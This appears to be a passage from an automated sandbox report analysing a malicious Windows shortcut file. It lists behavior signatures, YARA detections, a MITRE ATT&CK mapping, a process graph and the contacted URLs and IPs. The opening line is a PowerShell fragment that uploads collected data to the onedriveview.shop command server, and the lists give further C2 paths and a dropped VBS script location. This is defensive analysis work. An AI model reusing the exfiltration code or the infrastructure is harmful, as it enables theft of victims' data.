16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected LonePage
              Source: Yara matchFile source: 00000004.00000002.1912194930.00000212ADC85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2771031189.000002536A6B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1912015299.00000212AD926000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.3468994470.000002B4BA7C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2765832433.00000253685AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.4141081747.000001ABD3EC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.3468473632.000002B4BA491000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1912015299.00000212AD8F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1912015299.00000212AD95E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.4143788357.000001ABD6830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1848046574.000001B6E42DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2765832433.0000025368520000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.3468473632.000002B4BA42B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.4143788357.000001ABD5B67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.4143788357.000001ABD5E8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.3468473632.000002B4BA437000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.3468473632.000002B4BA472000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2708175995.0000025300001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.4141081747.000001ABD3F4D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.4143788357.000001ABD5C2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1848046574.000001B6E3DE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2708175995.0000025301A62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6928, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6908, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4476, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 2116, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4600, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\Public\Libraries\Libraries.vbs, type: DROPPED

              Remote Access Functionality

              barindex
              Yara detected LonePage
              Source: Yara matchFile source: 00000004.00000002.1912194930.00000212ADC85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2771031189.000002536A6B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1912015299.00000212AD926000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.3468994470.000002B4BA7C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2765832433.00000253685AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.4141081747.000001ABD3EC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.3468473632.000002B4BA491000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1912015299.00000212AD8F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1912015299.00000212AD95E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.4143788357.000001ABD6830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1848046574.000001B6E42DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2765832433.0000025368520000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.3468473632.000002B4BA42B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.4143788357.000001ABD5B67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.4143788357.000001ABD5E8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.3468473632.000002B4BA437000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.3468473632.000002B4BA472000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2708175995.0000025300001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.4141081747.000001ABD3F4D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.4143788357.000001ABD5C2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1848046574.000001B6E3DE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2708175995.0000025301A62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6928, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6908, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4476, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 2116, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4600, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\Public\Libraries\Libraries.vbs, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information111
              Scripting              		Valid Accounts1
              Command and Scripting Interpreter              		1
              Scheduled Task/Job              		11
              Process Injection              		11
              Masquerading              		OS Credential Dumping11
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Scheduled Task/Job              		111
              Scripting              		1
              Scheduled Task/Job              		31
              Virtualization/Sandbox Evasion              		LSASS Memory11
              Process Discovery              		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		11
              Process Injection              		Security Account Manager31
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts3
              PowerShell              		Login HookLogin Hook1
              Obfuscated Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing              		LSA Secrets1
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials22
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1522684 Sample: Xkci1BfrmX.lnk Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 46 Malicious sample detected (through community Yara rule) 2->46 48 Windows shortcut file (LNK) starts blacklisted processes 2->48 50 Multi AV Scanner detection for submitted file 2->50 52 14 other signatures 2->52 8 wscript.exe 1 2->8         started        11 powershell.exe 17 21 2->11         started        15 wscript.exe 2->15         started        17 svchost.exe 2->17         started        process3 dnsIp4 54 Windows shortcut file (LNK) starts blacklisted processes 8->54 56 Suspicious powershell command line found 8->56 58 Wscript starts Powershell (via cmd or directly) 8->58 64 3 other signatures 8->64 19 powershell.exe 16 8->19         started        42 188.114.97.3 CLOUDFLARENETUS European Union 11->42 38 C:\Users\Public\Libraries\Libraries.vbs, ASCII 11->38 dropped 60 Uses schtasks.exe or at.exe to add and modify task schedules 11->60 62 Found suspicious powershell code related to unpacking or dynamic code loading 11->62 21 Acrobat.exe 72 11->21         started        23 conhost.exe 1 11->23         started        25 schtasks.exe 1 11->25         started        27 powershell.exe 15->27         started        44 127.0.0.1 unknown unknown 17->44 file5 signatures6 process7 process8 29 conhost.exe 19->29         started        31 AcroCEF.exe 105 21->31         started        33 conhost.exe 27->33         started        process9 35 AcroCEF.exe 31->35         started        dnsIp10 40 23.56.162.185 AKAMAI-ASUS United States 35->40

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Xkci1BfrmX.lnk18%ReversingLabsShortcut.Trojan.Pantera
              Xkci1BfrmX.lnk100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://x1.i.lencr.org/0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              No contacted domains info

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1894925547.000001B6F251F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1894925547.000001B6F2662000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2759329285.00000253101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2759329285.0000025310085000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2708175995.0000025301A62000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.6.drfalse
              • URL Reputation: safe
              		unknown
              https://onedriveview.shop/api/values/82980464243822115700/refresh81/3021569784.txtpowershell.exe, 00000012.00000002.4143788357.000001ABD6040000.00000004.00000800.00020000.00000000.sdmpfalse
                		unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2708175995.000002530022E000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2708175995.000002530022E000.00000004.00000800.00020000.00000000.sdmpfalse
                  		unknown
                  https://go.micropowershell.exe, 00000000.00000002.1848046574.000001B6E30E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2708175995.00000253011A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.4143788357.000001ABD6040000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.microsoft.copowershell.exe, 00000000.00000002.1899915520.000001B6FA6A0000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    https://contoso.com/Licensepowershell.exe, 00000005.00000002.2708175995.0000025301A62000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/Iconpowershell.exe, 00000005.00000002.2708175995.0000025301A62000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://onedriveview.shop/api/values/82980464243822115700/refresh81/powershell.exe, 00000012.00000002.4194744188.000001ABEDE20000.00000004.00000020.00020000.00000000.sdmp, Libraries.vbs.0.drtrue
                      		unknown
                      https://onedriveview.shop/api/values/82980464243822115700/refresh81/9738145602.txtpowershell.exe, 00000005.00000002.2708175995.00000253011A5000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        http://crl.ver)svchost.exe, 00000007.00000002.3506944741.000001D5D0A8E000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://g.live.com/odclientsettings/ProdV2.C:edb.log.7.drfalse
                            		unknown
                            https://aka.ms/pscore6powershell.exe, 00000012.00000002.4143788357.000001ABD5B19000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://onedriveview.shop/api/vapowershell.exe, 00000012.00000002.4143788357.000001ABD5F8D000.00000004.00000800.00020000.00000000.sdmptrue
                                		unknown
                                https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2708175995.000002530022E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://onedriveview.shop/api/valpowershell.exe, 00000012.00000002.4143788357.000001ABD6647000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.4143788357.000001ABD6610000.00000004.00000800.00020000.00000000.sdmptrue
                                    		unknown
                                    https://g.live.com/odclientsettings/Prod.C:edb.log.7.drfalse
                                      		unknown
                                      https://onedriveview.shoppowershell.exe, 00000000.00000002.1848046574.000001B6E3AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1848046574.000001B6E3AE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2708175995.00000253011A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2708175995.00000253016CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.4143788357.000001ABD6040000.00000004.00000800.00020000.00000000.sdmptrue
                                        		unknown
                                        https://g.live.com/odclientsettings/ProdV2edb.log.7.drfalse
                                          		unknown
                                          http://crl.micropowershell.exe, 00000000.00000002.1901146654.000001B6FA7FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96edb.log.7.drfalse
                                              		unknown
                                              https://onedriveview.shop/api/values/view/sklyar.txtXkci1BfrmX.lnktrue
                                                		unknown
                                                https://contoso.com/powershell.exe, 00000005.00000002.2708175995.0000025301A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1894925547.000001B6F251F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1894925547.000001B6F2662000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2759329285.00000253101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2708175995.0000025301A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://onedriveview.shop/api/valuepowershell.exe, 00000000.00000002.1848046574.000001B6E3CE7000.00000004.00000800.00020000.00000000.sdmptrue
                                                  		unknown
                                                  http://onedriveview.shoppowershell.exe, 00000000.00000002.1848046574.000001B6E3AFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2708175995.00000253016D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.4143788357.000001ABD6610000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://onedriveview.shop/api/values/refresh81powershell.exe, 00000012.00000002.4194744188.000001ABEDE20000.00000004.00000020.00020000.00000000.sdmp, Libraries.vbs.0.drtrue
                                                      		unknown
                                                      https://onedriveview.shpowershell.exe, 00000012.00000002.4143788357.000001ABD5B67000.00000004.00000800.00020000.00000000.sdmptrue
                                                        		unknown
                                                        https://onedriveview.shop/api/values/refresh81Xpowershell.exe, 00000012.00000002.4143788357.000001ABD5F8D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://aka.ms/pscore68powershell.exe, 00000000.00000002.1848046574.000001B6E24B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2708175995.0000025300001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.4143788357.000001ABD5B3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1848046574.000001B6E24B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2708175995.0000025300001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.4143788357.000001ABD5B67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6qmgr.db.7.dr, edb.log.7.drfalse
                                                            		unknown

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            188.114.97.3
                                                            		unknownEuropean Union
                                                            		13335CLOUDFLARENETUSfalse
                                                            23.56.162.185
                                                            		unknownUnited States
                                                            		16625AKAMAI-ASUSfalse

                                                            Private

                                                            IP
                                                            127.0.0.1

                                                            General Information

                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1522684
                                                            Start date and time:2024-09-30 15:29:09 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 7m 28s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:20
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:Xkci1BfrmX.lnk
                                                            renamed because original name is a hash value
                                                            Original Sample Name:757fcc23a03ad93e5414ae62b910ec171286123a903472bc9bfe102ec9d30d78.lnk
                                                            Detection:MAL
                                                            Classification:mal100.spre.troj.expl.evad.winLNK@29/47@0/3
                                                            EGA Information:Failed
                                                            HCA Information:
                                                            • Successful, ratio: 100%
